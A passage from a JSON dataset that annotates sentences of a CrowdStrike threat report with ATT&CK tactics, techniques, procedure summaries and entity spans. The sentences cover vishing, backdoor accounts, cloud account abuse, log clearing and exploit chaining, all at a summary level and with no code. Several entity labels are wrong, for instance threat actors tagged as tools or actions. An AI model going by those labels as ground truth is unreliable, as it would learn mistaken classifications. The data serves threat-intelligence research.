NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p4-s17-12a050", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 4, "sentence_id": 17, "context_before": "EXECUTIVE SUMMARY\nADVERSARY NATION-STATE OR CATEGORY BEAR RUSSIA BUFFALO VIETNAM CHOLLIMA DPRK (NORTH KOREA) CONVENTIONS CRANE ROK (REPUBLIC OF KOREA)", "sentence_text": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TURKEY", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p5-s18-9a62bd", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 5, "sentence_id": 18, "context_before": "HAWK SYRIA NAMING JACKAL HACKTIVIST KITTEN IRAN LEOPARD PAKISTAN LYNX GEORGIA OCELOT COLOMBIA PANDA PEOPLE’S REPUBLIC OF CHINA SAIGA KAZAKHSTAN SPHINX EGYPT SPIDER eCRIME TIGER INDIA WOLF TURKEY", "sentence_text": "AMERICA OCEANIA AFRICA", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p5-s19-6c9d4e", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 5, "sentence_id": 19, "context_before": "AMERICA OCEANIA AFRICA", "sentence_text": "Top 10 Industries Targeted by Interactive Intrusions 23% 15% 12% 11% 10% 9% 7% 6% 4% 3% TECHNOLOGY CONSULTING AND MANUFACTURING RETAIL FINANCIAL SERVICES HEALTHCARE TELECOMMUNICATIONS GOVERNMENT INDUSTRIALS AND ACADEMIC PROFESSIONAL SERVICES ENGINEERING 79% 75% 71% 62% These statistics highlight the global reach 51% of adversary operations and the necessity for cross-domain security strategies that account 40% for identity compromise, lateral movement, and cloud-based attack vectors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p5-s20-fbe871", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 5, "sentence_id": 20, "context_before": "Top 10 Industries Targeted by Interactive Intrusions 23% 15% 12% 11% 10% 9% 7% 6% 4% 3% TECHNOLOGY CONSULTING AND MANUFACTURING RETAIL FINANCIAL SERVICES HEALTHCARE TELECOMMUNICATIONS GOVERNMENT INDUSTRIALS AND ACADEMIC PROFESSIONAL SERVICES ENGINEERING 79% 75% 71% 62% These statistics highlight the global reach 51% of adversary operations and the necessity for cross-domain security strategies that account 40% for identity compromise, lateral movement, and cloud-based attack vectors.", "sentence_text": "The shift toward malware-free attack techniques has been a defining trend over the past five years.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p6-s21-25feac", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 6, "sentence_id": 21, "context_before": "The shift toward malware-free attack techniques has been a defining trend over the past five years.", "sentence_text": "EXECUTIVE SUMMARY\nKeyKey\nAdversaryAdversary\nThemesThemes\nTHE BUSINESS OF SOCIAL ENGINEERING Initial access techniques shifted in 2024 as adversaries targeted human weaknesses, using compromised credentials and social engineering to gain access and move laterally within organizations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p6-s22-2607a0", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 6, "sentence_id": 22, "context_before": "EXECUTIVE SUMMARY\nKeyKey\nAdversaryAdversary\nThemesThemes\nTHE BUSINESS OF SOCIAL ENGINEERING Initial access techniques shifted in 2024 as adversaries targeted human weaknesses, using compromised credentials and social engineering to gain access and move laterally within organizations.", "sentence_text": "engineering campaigns and help desk manipulation, signaling an evolution in eCrime tactics.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p6-s23-f3111d", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 6, "sentence_id": 23, "context_before": "engineering campaigns and help desk manipulation, signaling an evolution in eCrime tactics.", "sentence_text": "• Vishing operations grew 442% between the first and second half of 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s24-fc35a1", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 24, "context_before": "• Vishing operations grew 442% between the first and second half of 2024.", "sentence_text": "EXECUTIVE SUMMARY\nCASE STUDY\nCURLY SPIDER\nSpam Gains Validates Uses Runs Deploys Bombing REMOTE ACCESS TO CONNECTION CURL TO SCRIPTS TO SET BACKDOOR QUICK ASSIST TO ADVERSARY- DOWNLOAD REGISTRY RUN USER CONTROLLED MALICIOUS KEYS AND REMOVE INFRASTRUCTURE SCRIPTS ARTIFACTS Adversary +3:43 +0:06 +0:06 CROWDSTRIKESTOP OVERWATCH Vishing Call BLOCKSIDENTIFIESBACKDOORAND ACCOUNT to stop a social engineering attack in less than four minutes In 2024, CURLY SPIDER emerged as one of the fastest and most adaptive eCrime adversaries.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1589", "name": "Gather Victim Identity Information" }, { "id": "T1566", "name": "Phishing" }, { "id": "T1547.001", "name": "Registry Run Keys / Startup Folder" } ], "procedure": "Spam bombing and vishing are used to gain access, followed by deploying scripts and a backdoor via Quick Assist, and establishing persistence with Registry Run Keys.", "entities": [ { "text": "CURLY SPIDER", "start": 29, "end": 41, "label": "ThreatActor" }, { "text": "CURL", "start": 117, "end": 121, "label": "Action" }, { "text": "SCRIPTS", "start": 125, "end": 132, "label": "MalwareTool" }, { "text": "QUICK ASSIST", "start": 149, "end": 161, "label": "Action" }, { "text": "Spam ", "start": 42, "end": 47, "label": "MalwareTool" }, { "text": "DOWNLOAD ", "start": 176, "end": 185, "label": "Action" }, { "text": "RUN USER CONTROLLED MALICIOUS KEYS", "start": 194, "end": 228, "label": "Action" }, { "text": "REMOVE INFRASTRUCTURE SCRIPTS", "start": 233, "end": 262, "label": "Action" }, { "text": "Bombing", "start": 81, "end": 88, "label": "Action" }, { "text": "ADVERSARY", "start": 165, "end": 174, "label": "MalwareTool" }, { "text": "Vishing Call", "start": 327, "end": 339, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s25-83a31a", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 25, "context_before": "EXECUTIVE SUMMARY\nCASE STUDY\nCURLY SPIDER\nSpam Gains Validates Uses Runs Deploys Bombing REMOTE ACCESS TO CONNECTION CURL TO SCRIPTS TO SET BACKDOOR QUICK ASSIST TO ADVERSARY- DOWNLOAD REGISTRY RUN USER CONTROLLED MALICIOUS KEYS AND REMOVE INFRASTRUCTURE SCRIPTS ARTIFACTS Adversary +3:43 +0:06 +0:06 CROWDSTRIKESTOP OVERWATCH Vishing Call BLOCKSIDENTIFIESBACKDOORAND ACCOUNT to stop a social engineering attack in less than four minutes In 2024, CURLY SPIDER emerged as one of the fastest and most adaptive eCrime adversaries.", "sentence_text": "In this case, they attempted to achieve their goals without needing to break out to another device.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s26-67264d", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 26, "context_before": "In this case, they attempted to achieve their goals without needing to break out to another device.", "sentence_text": "The entire attack chain — from initial user interaction and social engineering to introducing a backdoor account to establish persistence — took under four minutes.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1566", "name": "Phishing" }, { "id": "T1136", "name": "Create Account" } ], "procedure": "Uses social engineering to gain initial access and introduces a backdoor account to establish persistence.", "entities": [ { "text": "social engineering", "start": 60, "end": 78, "label": "Action" }, { "text": "introducing a backdoor account", "start": 82, "end": 112, "label": "Action" }, { "text": "backdoor account", "start": 96, "end": 112, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s27-e3b5e6", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 27, "context_before": "The entire attack chain — from initial user interaction and social engineering to introducing a backdoor account to establish persistence — took under four minutes.", "sentence_text": "Once CURLY SPIDER gains initial access, their window of opportunity is limited; access will only last as long as the victim is on the call.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s28-352475", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 28, "context_before": "Once CURLY SPIDER gains initial access, their window of opportunity is limited; access will only last as long as the victim is on the call.", "sentence_text": "To extend control, the adversary’s immediate objective is to establish persistent access before the session ends.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s29-7f3b18", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 29, "context_before": "To extend control, the adversary’s immediate objective is to establish persistent access before the session ends.", "sentence_text": "With remote access secured, CURLY SPIDER moves quickly — often while still actively engaging with the victim — to deploy their payloads and establish persistence.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": null, "procedure": "Deploys payloads and establishes persistence after remote access is secured.", "entities": [ { "text": "CURLY SPIDER", "start": 28, "end": 40, "label": "ThreatActor" }, { "text": "deploy their payloads", "start": 114, "end": 135, "label": "Action" }, { "text": "establish persistence", "start": 140, "end": 161, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s30-180724", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 30, "context_before": "With remote access secured, CURLY SPIDER moves quickly — often while still actively engaging with the victim — to deploy their payloads and establish persistence.", "sentence_text": "Most of the intrusion time is spent ensuring connectivity and troubleshooting access issues to reach their cloud-hosted malicious scripts.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s31-0667e2", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 31, "context_before": "Most of the intrusion time is spent ensuring connectivity and troubleshooting access issues to reach their cloud-hosted malicious scripts.", "sentence_text": "Generative AI and the Enterprising Adversary", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s32-c0146d", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 32, "context_before": "Generative AI and the Enterprising Adversary", "sentence_text": "Despite the relative novelty of genAI, CrowdStrike has identified several examples of adversaries using it.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" }, { "id": "T1588.002", "name": "Tool" } ], "procedure": "adversaries use AI", "entities": [ { "text": "adversaries", "start": 86, "end": 97, "label": "MalwareTool" }, { "text": "using it", "start": 98, "end": 106, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s33-197a15", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 33, "context_before": "Despite the relative novelty of genAI, CrowdStrike has identified several examples of adversaries using it.", "sentence_text": "GenAI’s low barrier to entry and powerful capabilities make it an appealing tool.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s34-d479c7", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 34, "context_before": "GenAI’s low barrier to entry and powerful capabilities make it an appealing tool.", "sentence_text": "It enables threat actors to craft convincing phishing • Large language models (LLMs) and genAI models that create photorealistic imagery can generate convincing content at scale with minimal expertise.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "Threat actors use generative AI and large language models to craft convincing phishing content at scale.", "entities": [ { "text": "threat actors", "start": 11, "end": 24, "label": "ThreatActor" }, { "text": "craft convincing phishing", "start": 28, "end": 53, "label": "Action" }, { "text": "generate convincing content at scale", "start": 141, "end": 177, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s35-c08e09", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 35, "context_before": "It enables threat actors to craft convincing phishing • Large language models (LLMs) and genAI models that create photorealistic imagery can generate convincing content at scale with minimal expertise.", "sentence_text": "They can support social engineering efforts or information operations.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s37-ad960b", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 37, "context_before": "•", "sentence_text": "In some cases, the adversary used genAI to create fake LinkedIn profiles.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" } ], "techniques": [ { "id": "T1585.001", "name": "Social Media Accounts" } ], "procedure": "Adversary used genAI to create a LinkedIn account", "entities": [ { "text": "adversary ", "start": 19, "end": 29, "label": "MalwareTool" }, { "text": "used ", "start": 29, "end": 34, "label": "Action" }, { "text": "to create fake LinkedIn profiles", "start": 40, "end": 72, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p7-s38-f0d2a6", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 7, "sentence_id": 38, "context_before": "In some cases, the adversary used genAI to create fake LinkedIn profiles.", "sentence_text": "• NITRO SPIDER used AI-generated websites in malvertising campaigns, filtering victims through malicious ads before redirecting others to AI-created fake pages.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" }, { "id": "TA0002", "name": "Execution" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" }, { "id": "T1204.001", "name": "Malicious Link" } ], "procedure": "NITRO SPIDER uses AI-generated websites to filter victims through malicious ads", "entities": [ { "text": "NITRO SPIDER", "start": 2, "end": 14, "label": "Action" }, { "text": "used ", "start": 15, "end": 20, "label": "Action" }, { "text": " redirecting", "start": 115, "end": 127, "label": "Action" }, { "text": "malvertising campaigns", "start": 45, "end": 67, "label": "Action" }, { "text": "AI-created fake pages", "start": 138, "end": 159, "label": "Action" }, { "text": "filtering victims through malicious ads", "start": 69, "end": 108, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s40-932677", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 40, "context_before": "•", "sentence_text": "Five of these groups are unique in their specialization and sophistication.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s41-fb269a", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 41, "context_before": "Five of these groups are unique in their specialization and sophistication.", "sentence_text": "Cloud-Conscious Actors Continue to Innovate Cloud-focused adversaries exploit misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for activities like data theft and ransomware deployment.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "Adversaries exploit misconfigurations, stolen credentials, and cloud tools to infiltrate systems, move laterally, maintain persistence, and conduct data theft and ransomware deployment.", "entities": [ { "text": "Cloud-focused adversaries", "start": 44, "end": 69, "label": "ThreatActor" }, { "text": "exploit misconfigurations, stolen credentials, and cloud management tools", "start": 70, "end": 143, "label": "Action" }, { "text": "infiltrate systems", "start": 147, "end": 165, "label": "Action" }, { "text": "move laterally", "start": 167, "end": 181, "label": "Action" }, { "text": "maintain persistent access", "start": 187, "end": 213, "label": "Action" }, { "text": "data theft", "start": 234, "end": 244, "label": "Action" }, { "text": "ransomware deployment", "start": 249, "end": 270, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s42-9ae760", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 42, "context_before": "Cloud-Conscious Actors Continue to Innovate Cloud-focused adversaries exploit misconfigurations, stolen credentials, and cloud management tools to infiltrate systems, move laterally, and maintain persistent access for activities like data theft and ransomware deployment.", "sentence_text": "China- and North Korea-nexus actors expanded their targeting of cloud platforms, and eCrime groups adopted advanced tactics such as abusing trust relationships and insider threats to compromise cloud resources.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s43-620972", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 43, "context_before": "China- and North Korea-nexus actors expanded their targeting of cloud platforms, and eCrime groups adopted advanced tactics such as abusing trust relationships and insider threats to compromise cloud resources.", "sentence_text": "• Valid account abuse has become the primary initial access tactic, accounting for 35% of cloud incidents in the first half of 2024.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0004", "name": "Privilege Escalation" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1078.001", "name": "Default Accounts" } ], "procedure": "Valid account abuse", "entities": [ { "text": "Valid account abuse", "start": 2, "end": 21, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s44-f4611b", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 44, "context_before": "• Valid account abuse has become the primary initial access tactic, accounting for 35% of cloud incidents in the first half of 2024.", "sentence_text": "Attackers are increasingly using stealth-oriented tactics and trying to access credentials to target valid accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": null, "procedure": "Attackers use stealth-oriented tactics and attempt to access credentials to target valid accounts.", "entities": [ { "text": "Attackers", "start": 0, "end": 9, "label": "ThreatActor" }, { "text": "trying to access credentials", "start": 62, "end": 90, "label": "Action" }, { "text": "credentials", "start": 79, "end": 90, "label": "Infrastructure_Indicator" }, { "text": "target valid accounts", "start": 94, "end": 115, "label": "Action" }, { "text": "valid accounts", "start": 101, "end": 115, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s45-ad9130", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 45, "context_before": "Attackers are increasingly using stealth-oriented tactics and trying to access credentials to target valid accounts.", "sentence_text": "• In 2023, eCrime adversary SCATTERED SPIDER accounted for 30% of all cloud intrusions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s46-2fcc1b", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 46, "context_before": "• In 2023, eCrime adversary SCATTERED SPIDER accounted for 30% of all cloud intrusions.", "sentence_text": "This number fell to 13% in 2024, partly because many nation-state and opportunistic threat actors are increasingly targeting the cloud control plane.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p8-s47-026062", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 8, "sentence_id": 47, "context_before": "This number fell to 13% in 2024, partly because many nation-state and opportunistic threat actors are increasingly targeting the cloud control plane.", "sentence_text": "• In 75% of observed cases, cloud-conscious actors removed indicators from log files in an attempt to evade detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1070.001", "name": "Clear Windows Event Logs" } ], "procedure": "actors removed indicators from logs", "entities": [ { "text": "cloud-conscious actors", "start": 28, "end": 50, "label": "ThreatActor" }, { "text": "removed indicators from log files", "start": 51, "end": 84, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s48-020058", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 48, "context_before": "• In 75% of observed cases, cloud-conscious actors removed indicators...", "sentence_text": "Enterprising Vulnerability Exploitation Adversaries are increasingly targeting internet-exposed network appliances, exploiting their inherent security weaknesses to gain initial access where endpoint detection and response (EDR) visibility is limited.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "Exploit security weaknesses in internet-exposed network appliances to gain initial access.", "entities": [ { "text": "Enterprising Vulnerability Exploitation Adversaries", "start": 0, "end": 51, "label": "ThreatActor" }, { "text": "targeting internet-exposed network appliances, exploiting their inherent security weaknesses to gain initial access", "start": 69, "end": 184, "label": "Action" }, { "text": "internet-exposed network appliances", "start": 79, "end": 114, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s49-e5ca50", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 49, "context_before": "EXECUTIVE SUMMARY\nEnterprising Vulnerability Exploitation Adversaries are increasingly targeting internet-exposed network appliances, exploiting their inherent security weaknesses to gain initial access where endpoint detection and response (EDR) visibility is limited.", "sentence_text": "They achieve remote code execution (RCE) with techniques such as chaining exploits or abusing legitimate product features, and they often repurpose known vulnerabilities to repeatedly compromise the same devices.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0003", "name": "Persistence" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "attackers achieve RCE by chaining exploits or abusing product features and repurpose known vulnerabilities to comprise the same machine repeatedly", "entities": [ { "text": "chaining exploits", "start": 65, "end": 82, "label": "Action" }, { "text": "abusing legitimate product features", "start": 86, "end": 121, "label": "Action" }, { "text": "repurpose known vulnerabilities to repeatedly compromise the same devices", "start": 138, "end": 211, "label": "Action" }, { "text": "They ", "start": 0, "end": 5, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s50-d943f7", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 50, "context_before": "They achieve remote code execution (RCE) with techniques such as chaining exploits or abusing legitimate product features, and they often repurpose known vulnerabilities to repeatedly compromise the same devices.", "sentence_text": "Adversaries continue to target end-of-life appliances, as outdated systems with unpatched vulnerabilities provide footholds into target environments.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" }, { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "adversaries target old appliances", "entities": [ { "text": "Adversaries ", "start": 0, "end": 12, "label": "MalwareTool" }, { "text": "to target end-of-life appliances", "start": 21, "end": 53, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s51-c96bba", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 51, "context_before": "Adversaries continue to target end-of-life appliances, as outdated systems with unpatched vulnerabilities provide footholds into target environments.", "sentence_text": "• Threat actors are targeting vulnerabilities within the network appliance’s because they potentially allow attackers to use one flaw to target multiple products running the same OS.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "attackers target vulnerabilities of the network's appliances", "entities": [ { "text": "Threat actors", "start": 2, "end": 15, "label": "ThreatActor" }, { "text": "are targeting vulnerabilities ", "start": 16, "end": 46, "label": "Action" }, { "text": "network appliance’s", "start": 57, "end": 76, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s52-ce2442", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 52, "context_before": "• Threat actors are targeting vulnerabilities within the network appliance’s because they potentially allow attackers to use one flaw to target multiple products running the same OS.", "sentence_text": "• Chaining multiple vulnerabilities offers attackers more advantages.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s53-e302d9", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 53, "context_before": "• Chaining multiple vulnerabilities offers attackers more advantages.", "sentence_text": "First, it allows them to achieve unauthenticated RCE by combining multiple exploits in one attack.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "they achieve RCE by combining multiple exploits", "entities": [ { "text": "combining multiple exploits", "start": 56, "end": 83, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s54-f18e01", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 54, "context_before": "First, it allows them to achieve unauthenticated RCE by combining multiple exploits in one attack.", "sentence_text": "Second, exploit chaining undermines the severity score-based patching process that many enterprises follow.\n• To discover new vulnerabilities or abuse legitimate product features, adversaries will likely use technical blogs and operationalize public proof-of-concept (POC) exploits faster than in previous years.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "Adversaries will use technical blogs and operationalize POC", "entities": [ { "text": " adversaries", "start": 179, "end": 191, "label": "MalwareTool" }, { "text": "use technical blogs and operationalize public proof-of-concept (POC) exploits", "start": 204, "end": 281, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s55-2b69d0", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 55, "context_before": "Second, exploit chaining undermines the severity score-based patching process that many enterprises follow.\n• To discover new vulnerabilities or abuse legitimate product features, adversaries will likely use technical blogs and operationalize public proof-of-concept (POC) exploits faster than in previous years.", "sentence_text": "SaaS Exploitation Expected to Continue Throughout 2024, CrowdStrike Intelligence observed several eCrime and targeted intrusion adversaries use access to cloud-based software as a service (SaaS) applications to obtain data to facilitate lateral movement, extortion, and third-party targeting.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" }, { "id": "TA0009", "name": "Collection" }, { "id": "TA0010", "name": "Exfiltration" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" }, { "id": "T1020", "name": "Automated Exfiltration" } ], "procedure": "adversaries use cloud -based software to obtain data", "entities": [ { "text": "adversaries", "start": 128, "end": 139, "label": "MalwareTool" }, { "text": "use access to cloud-based software", "start": 140, "end": 174, "label": "Action" }, { "text": " to obtain data", "start": 207, "end": 222, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s56-ccfede", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 56, "context_before": "SaaS Exploitation Expected to Continue Throughout 2024, CrowdStrike Intelligence observed several eCrime and targeted intrusion adversaries use access to cloud-based software as a service (SaaS) applications to obtain data to facilitate lateral movement, extortion, and third-party targeting.", "sentence_text": "Threat actors often accessed these applications by compromising single sign-on (SSO) identities.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], "procedure": "actors access the cloud applications by compromising SSO identities", "entities": [ { "text": "Threat actors", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "accessed ", "start": 20, "end": 29, "label": "Action" }, { "text": "compromising ", "start": 51, "end": 64, "label": "Action" } ] }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s57-5c2473", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 57, "context_before": "Threat actors often accessed these applications by compromising single sign-on (SSO) identities.", "sentence_text": "As cloud adoption grows, we expect adversaries to refine their tradecraft in 2025, making SaaS exploitation a critical and evolving threat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s58-596719", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 58, "context_before": "As cloud adoption grows, we expect adversaries to refine their tradecraft in 2025, making SaaS exploitation a critical and evolving threat.", "sentence_text": "• In the first half of 2024, cloud-conscious threat actors frequently targeted Microsoft 365, with SharePoint accessed in 22% of intrusions and Outlook in 17%.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-48_crowdstrike_report-p9-s59-5fa904", "source": "crowdstrike", "doc_id": "48_crowdstrike_report", "page_number": 9, "sentence_id": 59, "context_before": "• In the first half of 2024, cloud-conscious threat actors frequently targeted Microsoft 365, with SharePoint accessed in 22% of intrusions and Outlook in 17%.", "sentence_text": "• SCATTERED SPIDER has leveraged compromised SSO accounts to access a wide range of integrated SaaS applications, including chat, customer relationship management, credential management, document storage, productivity, and security tools.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078.004", "name": "Cloud Accounts" } ], 